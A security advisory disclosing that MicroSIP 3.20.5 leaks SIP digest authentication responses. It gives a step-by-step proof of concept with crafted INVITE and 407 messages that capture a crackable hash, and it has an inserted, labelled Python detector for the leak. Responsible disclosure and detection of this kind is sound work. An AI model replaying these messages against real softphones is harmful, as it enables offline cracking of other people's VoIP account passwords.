Advisory ID:               SYSS-2021-019
Product:                   MicroSIP
Manufacturer:              MicroSIP
Affected Version(s):       MicroSIP/3.20.5
Tested Version(s):         MicroSIP/3.20.5
Vulnerability Type:        Exposure of Sensitive Information to an
                           Unauthorized Actor (CWE-200)
Risk Level:                Medium
Solution Status:           Fixed
Manufacturer Notification: 2021-04-08
Solution Date:             2021-08-25
Public Disclosure:         2021-10-13
CVE Reference:             -
Authors of Advisory:       Moritz Abrell

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

"MicroSIP [1] is an open source portable SIP softphone based on PJSIP
stack for Windows OS. It allowing to do high quality VoIP calls
(person-to-person or on regular telephones) via open SIP protocol. From
cloud of SIP providers you can choose best for you, register account and
use it with MicroSIP. You'll get free person-to-person calls and cheap
international calls."

The MicroSIP softphone is vulnerable to SIP digest authentication
leakage: it leaks data that can be used to brute-force the login
credentials for the extension of the MicroSIP SIP account.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

If a SIP INVITE request is sent to the SIP service of MicroSIP, the
softphone rings and signals an incoming call. If the user accepts the
call and later hangs up, the softphone sends a SIP BYE request to the
caller. The caller can now respond with a 407 "Proxy Authentication
Required" message containing authentication parameters, such as a realm
and a nonce value. The softphone then sends a new SIP BYE request
containing a complete digest authentication response. This response
includes all parameters required to perform an offline password
brute-force attack against the MicroSIP SIP account credentials.

For a successful attack, the SIP port (default UDP and TCP 5060) of the
softphone must be accessible via the network.
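A defender-side check for the behaviour described above, as an added example that is not part of the SySS advisory or of MicroSIP's code: it flags any outgoing SIP request that carries digest credentials toward a host outside a trusted registrar/proxy set, using the two BYE requests quoted in the proof of concept as input. The trusted address and all function names are assumptions, and the Request-URI host stands in for the packet's real destination address.

```python
import re

# Assumption: hosts allowed to challenge this softphone (its own registrar or
# proxy). Constructed value; the advisory does not name one.
TRUSTED_PROXIES = {"192.168.122.10"}
CRED_HEADERS = ("authorization", "proxy-authorization")

def parse_sip(raw):
    """Return (start_line, {lowercased header: value}); the body is ignored."""
    head = raw.replace("\r\n", "\n").strip().split("\n\n", 1)[0]
    lines = [l.strip() for l in head.splitlines() if l.strip()]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def request_uri_host(start_line):
    """Host of the Request-URI, used here as a stand-in for the packet's peer."""
    m = re.match(r"^\S+\s+sips?:(?:[^@\s]+@)?([^:;\s]+)", start_line)
    return m.group(1) if m else None

def leaked_digest(raw, trusted=TRUSTED_PROXIES):
    """Finding dict if a request carries digest credentials to an untrusted host."""
    start, headers = parse_sip(raw)
    if start.startswith("SIP/2.0"):  # status line: a response, not a request
        return None
    cred = next((headers[h] for h in CRED_HEADERS if h in headers), None)
    host = request_uri_host(start)
    if cred is None or host in trusted:
        return None
    params = dict(re.findall(r'(\w+)="?([^",]+)"?', cred))
    return {"method": start.split()[0], "peer": host,
            "username": params.get("username"), "realm": params.get("realm")}

# Outgoing BYE requests as quoted in the PoC (steps 4 and 6), headers abridged.
FIRST_BYE = """BYE sip:sipp@192.168.122.1:5060 SIP/2.0
Call-ID: 1-18567@192.168.122.1
CSeq: 19072 BYE
User-Agent: MicroSIP/3.20.5
"""
SECOND_BYE = """BYE sip:101@192.168.122.1:5060 SIP/2.0
Call-ID: 1-18567@192.168.122.1
CSeq: 19073 BYE
Authorization: Digest username="100", realm="asterisk", nonce="69d327e5", uri="sip:101@192.168.122.1:5060", response="fd1b84475d183409b288e76d07682a06", algorithm=MD5
"""

if __name__ == "__main__":
    for msg in (FIRST_BYE, SECOND_BYE):
        print(leaked_digest(msg))
```

The same rule applies to any in-dialog request (not only BYE), so it can run unchanged over requests extracted from a capture of softphone traffic.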

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. Sending a SIP INVITE request to MicroSIP:

INVITE sip:100@192.168.122.168:5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.122.1:5060;branch=z9hG4bK-18567-1-0
From: ;tag=1
To:
Call-ID: 1-18567@192.168.122.1
CSeq: 1 INVITE
Contact: sip:101@192.168.122.1:5060
Max-Forwards: 70
Subject: Performance Test
Content-Type: application/sdp
Content-Length: 137

v=0
o=user1 53655765 2353687637 IN IP4 192.168.122.1
s=-
c=IN IP4 192.168.122.1
t=0 0
m=audio 6000 RTP/AVP 8
a=rtpmap:8 PCMA/8000

2. The softphone rings and signals an incoming call.

3. The user accepts the call and hangs up because there is no audio.

4. The softphone sends a BYE request to the attacker:

BYE sip:sipp@192.168.122.1:5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.122.168:64688;rport;branch=z9hG4bKPj2499b1d
Max-Forwards: 70
From: ;tag=c1a67859ed404cb48f47d2779a038937
To: ;tag=1
Call-ID: 1-18567@192.168.122.1
CSeq: 19072 BYE
User-Agent: MicroSIP/3.20.5
Content-Length: 0

5. Sending a 407 "Proxy Authentication Required" response with a realm
   and a nonce value:

SIP/2.0 407 Proxy Authentication Required
Via: SIP/2.0/UDP 192.168.122.168:64688;rport;branch=z9hG4bKPj2499b1d
From: ;tag=c1a67859ed404cb48f47d2779a038937
To: ;tag=1
Call-ID: 1-18567@192.168.122.1
CSeq: 19072 BYE
WWW-Authenticate: Digest algorithm=MD5, realm="asterisk", nonce="69d327e5"
Content-Length: 0

6. MicroSIP sends a second BYE request with an "Authorization" header:

BYE sip:101@192.168.122.1:5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.122.168:64688;rport;branch=z9hG4bKPj2499b1d
Max-Forwards: 70
From: ;tag=c1a67859ed404cb48f47d2779a038937
To: ;tag=1
Call-ID: 1-18567@192.168.122.1
CSeq: 19073 BYE
User-Agent: MicroSIP/3.20.5
Authorization: Digest username="100", realm="asterisk", nonce="69d327e5", uri="sip:101@192.168.122.1:5060", response="fd1b84475d183409b288e76d07682a06", algorithm=MD5
Content-Length: 0

The attacker is now able to perform an offline password brute-force
attack against the SIP account of MicroSIP.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

A fix is provided by the manufacturer in MicroSIP version 3.20.7,
available at the MicroSIP download site [3].

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-04-08: Vulnerability reported to manufacturer
2021-04-13: Confirmation and information received about a planned
            solution in the next release from the manufacturer.
2021-05-25: Security patch provided by the manufacturer, but the
            vulnerability still exists.
2021-08-25: Fix of the vulnerability provided by the manufacturer in
            version 3.20.7.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1]: Product website for MicroSIP:
     https://www.microsip.org/
[2]: SySS Responsible Disclosure Policy:
     https://www.syss.de/en/news/responsible-disclosure-policy/
[3]: Download Site of MicroSIP:
     https://www.microsip.org/downloads

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail: moritz.abrell@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en